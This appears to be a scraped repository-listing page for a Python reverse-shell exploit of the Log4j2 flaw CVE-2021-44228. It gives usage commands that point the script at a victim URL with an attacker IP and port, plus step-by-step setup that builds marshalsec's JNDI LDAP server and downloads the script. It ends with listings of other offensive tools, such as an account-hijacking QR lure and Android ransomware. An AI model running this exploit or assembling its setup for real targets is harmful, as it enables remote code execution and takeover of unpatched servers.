Log4j2 CVE-2021-44228 revshell

Related tags

Security related resourcesLog4j2-CVE-2021-44228-revshell
Overview

Log4j2-CVE-2021-44228-revshell

Usage

For reverse shell:
$~ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [AttackerPort] -hp [HTTPServerPort]

For check exploitable:
$~ python3 Log4j2-revshell.py -M check -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [AttackerPort]

$~  python3 Log4j2-revshell.py -h
    usage: Log4j2-revshell.py [-h] -M MODE -u TARGET -l LHOST -p LPORT [-hp HTTPPORT]

    Log4j2 Reverse Shell

    optional arguments:
      -h, --help            show this help message and exit
      -M MODE, --mode MODE  Mode: check or rev
      -u TARGET, --target TARGET
                            Target full URL, http://www.victimLog4j.xyz:8080
      -l LHOST, --lhost LHOST
                            Attacker IP for receive revshell
      -p LPORT, --lport LPORT
                            Attacker port for receive revshell
      -hp HTTPPORT, --httpport HTTPPORT
                            HTTP server port on attacker host

Requirement

1. Marshalsec jndi.LDAPRefServer # see here, https://github.com/mbechler/marshalsec
2. Java 8 # you can get Java 8 here https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html, 
   suggested to install jdk-8u181-linux-x64.tar.gz [Java 1.8.0_181]
3. This script, Log4j2-revshell.py

TLDR; Guided step

$ Open browser and Download Java 8 from https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html 
  In Java SE Development Kit 8u181 section, select jdk-8u181-linux-x64.tar.gz or appropriate package based on your OS.
    
$ sudo mkdir /usr/lib/jvm #Make this dir if you do not have yet
$ cd /usr/lib/jvm
$ sudo tar xzvf ~/Downloads/jdk-8u181-linux-x64.tar.gz #Extract downloaded jdk-8u181-linux-x64.tar.gz into /usr/lib/jvm
$ sudo update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_181/bin/java" 1
$ sudo update-alternatives --install "/usr/bin/javac" "javac" "/usr/lib/jvm/jdk1.8.0_181/bin/javac" 1
$ sudo update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/lib/jvm/jdk1.8.0_181/bin/javaws" 1

$ sudo update-alternatives --set java /usr/lib/jvm/jdk1.8.0_181/bin/java
$ sudo update-alternatives --set javac /usr/lib/jvm/jdk1.8.0_181/bin/javac
$ sudo update-alternatives --set javaws /usr/lib/jvm/jdk1.8.0_181/bin/javaws
$ java -version #verify if you are running Java 1.8.0_181

$ git clone https://github.com/mbechler/marshalsec /tmp/Log4j2-dir; cd /tmp/Log4j2-dir #Install marshalsec jndi.LDAPRefServer
$ sudo apt install -y maven #Build marshalsec with the Java builder maven. If you do not have maven, please install first
$ mvn clean package -DskipTests #Build marshalsec tool with maven 
$ cd /tmp/Log4j2-dir; wget -q https://raw.githubusercontent.com/faisalfs10x/Log4j2-CVE-2021-44228-revshell/main/Log4j2-revshell.py

$ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [AttackerPort] -hp [HTTPServerPort]

PoC

target host: http://192.168.5.122:8080
attacker host: 192.168.5.120
log4j2.mp4

Tested on

- Ubuntu 18.04

Disclaimer:

The script is for security analysis and research only, hence I would not be liable if it is been used for illicit activities
Owner
FaisalFs
◤✞ 𝖏𝖚𝖘𝖙 𝖆 𝖘𝖎𝖒𝖕𝖑𝖊 𝖑𝖚𝖈𝖐 ✞◥
FaisalFs
GitHub Repository
Cve-2022-23131 - Cve-2022-23131 zabbix-saml-bypass-exp

cve-2022-23131 cve-2022-23131 zabbix-saml-bypass-exp replace [zbx_signed_session

东方有鱼名为咸 135 Dec 14, 2022
Better-rtti-parser - IDA script to parse RTTI information in executable

RTTI parser Parses RTTI information from executable. Example HexRays decompiler view Before: After: Functions window Before: After: Structs window Ins

101 Jan 04, 2023
Python implementation of the diceware password generating algorithm.

Diceware Password Generator - Generate High Entropy Passwords Please Note - This Program Do Not Store Passwords In Any Form And All The Passwords Are

Sameera Madushan 35 Dec 25, 2022
script that pulls cve collections from NVD.NIST.GOV.

# cvepull.py #script that pulls cve collections from NVD.NIST.GOV. #edit line 17 (timedelta) number to change the amount of days to search backwards

Aaron W 1 Dec 18, 2021
Python directory buster, multiple threads, gobuster-like CLI, web server brute-forcer, URL replace pattern feature.

pybuster v1.1 pybuster is a tool that is used to brute-force URLs of web servers. Features Directory busting (URI) URL replace patterns (put PYBUSTER

Glaukio 1 Jan 05, 2022
Omega - From Wordpress admin to pty

The Linux tool to automate the process of getting a pty once you got admin credentials in a Wordpress site. Keep in mind that right now Omega only can attack Linux hosts.

Ángel Heredia 12 Nov 09, 2022
大宝剑-信息收集和资产梳理工具(红队、蓝队、企业组织架构、子域名、Web资产梳理、Web指纹识别、ICON_Hash资产匹配)

大宝剑-信息收集和资产梳理工具(红队、蓝队、企业组织架构、子域名、Web资产梳理、Web指纹识别、ICON_Hash资产匹配)

Wolf Group Security Team 835 Jan 05, 2023
You can crack any zip file and get the password.

Zip-Cracker Video Lesson : This is a Very powerfull Zip File Crack tool for termux users. Check 500 000 Passwords in 30 seconds Unique Performance Che

Razor Kenway 13 Oct 24, 2022
Automatic SQL injection and database takeover tool

sqlmap sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of

sqlmapproject 25.7k Jan 08, 2023
GitGuardian Shield: protect your secrets with GitGuardian

Detect secret in source code, scan your repo for leaks. Find secrets with GitGuardian and prevent leaked credentials. GitGuardian is an automated secrets detection & remediation service.

GitGuardian 1.2k Dec 27, 2022
Installation of hacking tools

Tools-Spartan This is a program that makes it easy for you to download and install tools used in Kali Linux, there are tons of tools available.

1 Nov 10, 2021
Scans all drives for log4j jar files and gets their version from the manifest

log4shell_scanner Scans all drives for log4j jar files and gets their version from the manifest. Windows and Windows Server only.

Zdeněk Loučka 1 Dec 29, 2021
Python exploit for vsftpd 2.3.4 - Backdoor Command Execution

CVE-2011-2523 - vsftpd 2.3.4 Exploit Discription vsftpd, which stands for Very Secure FTP Daemon,is an FTP server for Unix-like systems, including Lin

Padsala Tushal 5 Nov 08, 2022
OSINT Cybersecurity Tools

OSINT Cybersecurity Tools Welcome to the World of OSINT: An ongoing collection of awesome tools and frameworks, best security software practices, libr

Paul Veillard, P. Eng 7 Jul 01, 2022
Scan Site - Tools For Scanning Any Site and Get Site Information

Site Scanner Tools For Scanning Any Site and Get Site Information Example Require - pip install colorama - pip install requests How To Use Download Th

NumeX 5 Mar 19, 2022
Hack any account sending fake nitro QR code (only for educational purpose)

DISCORD_ACCOUNT_HACKING_TOOL ( EDUCATIONAL PURPOSE ) Hack any account sending fake nitro QR code (only for educational purpose) Start my program token

Novy 7 Jan 07, 2022
SARA - Simple Android Ransomware Attack

SARA - Simple Android Ransomware Attack Disclaimer The author is not responsible for any issues or damage caused by this program. Features User can cu

Termux Hackers 99 Jan 04, 2023
A set of blender assets created for the $yb NFT project.

fyb-blender A set of blender assets created for the $yb NFT project. Install just as you would any other Blender Add-on (via Edit-Preferences-Add-on

Pedro Arroyo 1 May 06, 2022
ORector - A Fast Python tool designed to detect open redirects vulnerabilities on websites

ORector is a Fast Python tool designed to detect open redirects vulnerabilities

11 Apr 02, 2022
Python HDFS client

Python HDFS client Because the world needs yet another way to talk to HDFS from Python. Usage This library provides a Python client for WebHDFS. NameN

Jing Wang 82 Dec 28, 2022